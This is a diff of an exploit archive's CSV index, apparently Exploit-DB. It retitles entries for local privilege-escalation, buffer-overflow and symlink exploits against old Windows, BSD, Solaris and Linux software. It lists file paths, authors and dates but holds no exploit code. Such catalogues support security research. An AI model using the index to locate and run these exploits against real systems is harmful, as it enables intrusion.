(SEH)",2009-03-23,His0k4,windows,local,0 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0 
@@ -6497,7 +6498,7 @@ id,file,description,date,author,platform,type,port 9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local,0 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0 9072,platforms/multiple/local/9072.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0 -9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 +9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 - 'vfs.usermount' Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation",2009-07-09,sgrakkyu,lin_x86-64,local,0 9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Exploit",2009-07-09,kingcope,multiple,local,0 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0 
@@ -6561,7 +6562,7 @@ id,file,description,date,author,platform,type,port 9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - '.psh' Universal Buffer Overflow XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0 9486,platforms/windows/local/9486.pl,"KSP 2006 FINAL - '.m3u' Universal Local Buffer Exploit (SEH)",2009-08-24,hack4love,windows,local,0 9488,platforms/freebsd/local/9488.c,"FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0 -9489,platforms/multiple/local/9489.txt,"Multiple BSD Distributions - 'setusercontext()' Vulnerabilities",2009-08-24,kingcope,multiple,local,0 +9489,platforms/multiple/local/9489.txt,"BSD (Multiple Distributions) - 'setusercontext()' Vulnerabilities",2009-08-24,kingcope,multiple,local,0 9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional - Kernel Local Buffer Overflow",2009-08-24,Heurs,windows,local,0 9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - '.wav' Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0 9501,platforms/windows/local/9501.py,"Audacity 1.2 - '.gro' Universal Buffer Overflow (egg hunter)",2009-08-24,mr_me,windows,local,0 
@@ -6838,7 +6839,7 @@ id,file,description,date,author,platform,type,port 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,windows,local,0 13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)",2010-06-23,Madjix,windows,local,0 -14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - 'nfs_mount()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 +14002,platforms/freebsd/local/14002.c,"FreeBSD - 'nfs_mount()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0 14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0 
@@ -7054,7 +7055,7 @@ id,file,description,date,author,platform,type,port 16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0 16099,platforms/android/local/16099.c,"Google Android 1.x/2.x - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - '.rtx' Buffer Overflow",2011-02-03,sickness,windows,local,0 -16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit",2011-02-06,kingcope,freebsd,local,0 +16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - 'sendfile' Memory Leak Exploit",2011-02-06,kingcope,freebsd,local,0 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16133,platforms/windows/local/16133.htm,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16138,platforms/windows/local/16138.c,"DESlock+ < 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0 
@@ -7334,7 +7335,7 @@ id,file,description,date,author,platform,type,port 19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - Missing /etc/group Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0 19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0 19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 power management - Exploit",1998-07-16,"Ralf Lehmann",solaris,local,0 -19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 sdtcm_convert - Exploit",1998-10-23,UNYUN,solaris,local,0 +19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 - 'sdtcm_convert' Exploit",1998-10-23,UNYUN,solaris,local,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local,0 19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0 
@@ -7358,10 +7359,10 @@ id,file,description,date,author,platform,type,port 19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password'",1998-03-19,"Martin Dolphin",windows,local,0 19198,platforms/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,windows,local,0 19199,platforms/solaris/local/19199.c,"Solaris 2.5.1 automount - Exploit",1997-11-26,anonymous,solaris,local,0 -19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (1)",1997-08-25,bloodmask,unix,local,0 -19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (2)",1997-08-25,jGgM,unix,local,0 -19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (3)",1997-08-25,jGgM,unix,local,0 -19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin Exploit",1996-12-04,"Roger Espel Llima",unix,local,0 +19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (1)",1997-08-25,bloodmask,unix,local,0 +19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (2)",1997-08-25,jGgM,unix,local,0 +19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / 
SunOS 4.1.4 - 'libXt Library' Exploit (3)",1997-08-25,jGgM,unix,local,0 +19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Exploit",1996-12-04,"Roger Espel Llima",unix,local,0 19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 dtprintinfo - Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 lpset - Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0 19209,platforms/windows/local/19209.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - Help File Buffer Overflow",1999-05-17,"David Litchfield",windows,local,0 @@ -7391,7 +7392,7 @@ id,file,description,date,author,platform,type,port 19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core - Exploit",1999-01-07,"John McDonald",solaris,local,0 19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc - Exploit",1999-02-03,xnec,linux,local,0 19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - '/usr/lib/netaddpr' Exploit",1997-05-09,"Jaechul Choe",irix,local,0 -19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0 +19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0 19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 cdplayer - Exploit",1996-11-21,"Yuri Volobuev",irix,local,0 19267,platforms/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin - Exploit",1996-08-06,"Grant Kaufmann",irix,local,0 
@@ -7454,8 +7455,8 @@ id,file,description,date,author,platform,type,port 19384,platforms/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Buffer Overflow",1999-06-25,KSR[T],linux,local,0 19371,platforms/linux/local/19371.c,"VMware 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0 -19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 -19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 +19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 +19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion()",1999-03-08,"Fabien Royer",windows,local,0 19417,platforms/osx/local/19417.txt,"Apple Mac OS 8 8.6 - Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local,0 19418,platforms/aix/local/19418.txt,"IBM AIX 4.3.1 adb - Exploit",1999-07-12,"GZ Apple",aix,local,0 
@@ -7510,13 +7511,13 @@ id,file,description,date,author,platform,type,port 19535,platforms/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp - Exploit",1996-12-01,SOD,hp-ux,local,0 19542,platforms/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' Symlink Exploit",1999-10-11,"Brock Tellier",sco,local,0 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 - cancel Buffer Overflow",1999-10-08,"Brock Tellier",sco,local,0 -19544,platforms/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local,0 -19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 +19544,platforms/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local,0 +19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Overflow Exploit (1)",1997-04-17,"Pavel Kankovsky",multiple,local,0 19547,platforms/multiple/local/19547.txt,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Overflow Exploit (2)",1997-04-17,"Willy Tarreau",multiple,local,0 19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (2)",1997-02-13,"Solar Designer",multiple,local,0 -19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 
2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local,0 +19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon Exploit",1996-11-16,"Leshka Zakharoff",multiple,local,0 19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - cwdtools Exploit",1999-10-22,"Brock Tellier",linux,local,0 19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Trojan",1999-12-10,"Pauli Ojanpera",windows,local,0 19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging",1999-12-10,"Brock Tellier",sco,local,0 
@@ -7535,11 +7536,11 @@ id,file,description,date,author,platform,type,port 19643,platforms/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow",1999-10-30,K2,sco,local,0 19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure - Exploit",1999-11-30,UNYUN,solaris,local,0 19648,platforms/solaris/local/19648.c,"Solaris 7.0 - CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,solaris,local,0 -19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 -19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 gdc - Symlink Exploit",1999-12-01,"Brock Tellier",freebsd,local,0 -19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid dialer",1999-12-01,"Brock Tellier",freebsd,local,0 -19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 -19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 angband - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 +19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 - 'gdc' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 +19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 - 'gdc' Symlink Exploit",1999-12-01,"Brock Tellier",freebsd,local,0 +19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid Dialer",1999-12-01,"Brock Tellier",freebsd,local,0 +19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 - 'xmindpath' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 +19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 - 'angband' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 40430,platforms/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0 19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin' Exploit",1998-12-02,"Brock Tellier",sco,local,0 19655,platforms/linux/local/19655.txt,"RSA 
Security RSAREF 2.0 - Buffer Overflow",1999-12-14,"Alberto Solino",linux,local,0 @@ -7575,7 +7576,7 @@ id,file,description,date,author,platform,type,port 19739,platforms/windows/local/19739.txt,"Microsoft Windows NT 4.0 - Recycle Bin Pre-created Folder",2000-02-01,"Arne Vidstron and Nobuo Miwa",windows,local,0 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink Exploit",2000-02-15,"Shawn Bracken",sco,local,0 19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - autorun.inf Exploit",2000-02-18,"Eric Stevens",windows,local,0 -19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu - Exploit",2000-02-19,anonymous,freebsd,local,0 +19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Exploit",2000-02-19,anonymous,freebsd,local,0 19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 - Licensing Manager Symlink Exploit",2000-02-21,sp00n,solaris,local,0 19762,platforms/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",linux,local,0 19763,platforms/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local,0 
@@ -7640,8 +7641,8 @@ id,file,description,date,author,platform,type,port 19981,platforms/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile - Exploit (3)",2000-05-31,IhaQueR,linux,local,0 19989,platforms/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0 19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 - man '/tmp' Symlink Exploit",2000-06-02,"Jason Axley",hp-ux,local,0 -19991,platforms/linux/local/19991.c,"BSD mailx 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0 -19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0 +19991,platforms/linux/local/19991.c,"BSD 'mailx' 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0 +19992,platforms/linux/local/19992.c,"BSD 'mailx' 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0 19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0 19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0 20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0 
@@ -7705,7 +7706,7 @@ id,file,description,date,author,platform,type,port 20250,platforms/linux/local/20250.c,"LBL Traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0 20251,platforms/linux/local/20251.c,"LBL Traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0 20252,platforms/linux/local/20252.c,"LBL Traceroute 1.4 a5 - Heap Corruption (3)",2000-09-28,"Michel Kaempf",linux,local,0 -20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - fstat Format String",2000-10-04,K2,openbsd,local,0 +20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - 'fstat' Format String",2000-10-04,K2,openbsd,local,0 20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0/2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0 20543,platforms/windows/local/20543.rb,"Microsoft Windows - Service Trusted Path Privilege Escalation (Metasploit)",2012-08-15,Metasploit,windows,local,0 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (2)",2012-08-05,pole,windows,local,0 
@@ -7721,7 +7722,7 @@ id,file,description,date,author,platform,type,port 20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (Large Shellcode)",2012-08-06,"Robert Larsen",windows,local,0 40428,platforms/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,windows,local,0 20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 - oidldap Exploit",2000-10-18,"Juan Manuel Pascual Escribá",linux,local,0 -20316,platforms/linux/local/20316.txt,"BSD lpr 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local,0 +20316,platforms/linux/local/20316.txt,"BSD 'lpr' 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local,0 20317,platforms/windows/local/20317.c,"Microsoft Windows NT 4.0 - MSIEXEC Registry Permissions",2000-10-23,Mnemonix,windows,local,0 20326,platforms/unix/local/20326.sh,"ntop 1.x - i Local Format String",2000-10-18,"Paul Starzetz",unix,local,0 20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 - crontab '/tmp' File Exploit",2000-10-20,"Kyong-won Cho",hp-ux,local,0 
@@ -7729,7 +7730,7 @@ id,file,description,date,author,platform,type,port 20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0 20339,platforms/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0 20341,platforms/linux/local/20341.sh,"Samba 2.0.7 - SWAT Logfile Permissions",2000-11-01,miah,linux,local,0 -20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x /usr/bin/top - Format String",2000-11-01,truefinder,freebsd,local,0 +20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x - '/usr/bin/top' Format String",2000-11-01,truefinder,freebsd,local,0 20378,platforms/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",linux,local,0 20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local,0 20381,platforms/unix/local/20381.c,"ManTrap 1.6.1 - Root Directory Inode Disclosure",2000-11-01,f8labs,unix,local,0 
@@ -7935,7 +7936,7 @@ id,file,description,date,author,platform,type,port 21373,platforms/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Compromise",2002-04-11,"Przemyslaw Frasunek",openbsd,local,0 21375,platforms/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",linux,local,0 21398,platforms/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,linux,local,0 -21407,platforms/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 +21407,platforms/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local,0 21414,platforms/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Buffer Overflow",2002-04-23,"Gobbles Security",unix,local,0 21420,platforms/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow",2001-11-01,MaXX,linux,local,0 
@@ -8059,8 +8060,8 @@ id,file,description,date,author,platform,type,port 22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unspecified Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local,0 22265,platforms/linux/local/22265.pl,"cPanel 5.0 - 'Openwebmail' Privilege Escalation",2003-02-19,deadbeat,linux,local,0 22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",multiple,local,0 -22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0 -22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0 +22332,platforms/unix/local/22332.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0 +22331,platforms/unix/local/22331.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0 22320,platforms/linux/local/22320.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local,0 22321,platforms/linux/local/22321.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (2)",2003-03-03,"Guilecool & deka",linux,local,0 22322,platforms/linux/local/22322.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (3)",2003-03-03,omega,linux,local,0 
@@ -8216,7 +8217,7 @@ id,file,description,date,author,platform,type,port 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0 23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0 23634,platforms/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,linux,local,0 -23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0 +23655,platforms/bsd/local/23655.txt,"BSD - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0 23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",linux,local,0 23674,platforms/linux/local/23674.txt,"(Linux Kernel 2.6) Samba 2.2.8 (Debian / Mandrake) - Share Privilege Escalation",2004-02-09,"Martin Fiala",linux,local,0 23682,platforms/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0 
